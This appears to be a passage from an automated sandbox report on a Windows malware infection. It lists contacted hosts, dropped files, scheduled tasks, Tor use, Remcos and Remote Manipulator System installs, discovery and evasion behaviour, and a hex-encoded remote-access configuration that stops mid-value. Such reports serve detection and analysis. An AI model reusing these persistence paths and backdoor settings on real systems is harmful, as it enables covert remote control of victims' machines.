N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\ruts\rfusclient.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\rutserv.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\boleto C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\rutssvc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\libeay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\xda C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\ruts\11.reg C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3832332d3230312d3938362d3533313c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223730313230223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42434536413638363145384133323441454133453342333332363045304634384431354136443844324633323636393041363643463637384533364132383633343444323745303844344145353038363730393646354642463639313232454335434130304342443143423644433941334637443841364435313831443538413c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973742f3e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e313c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7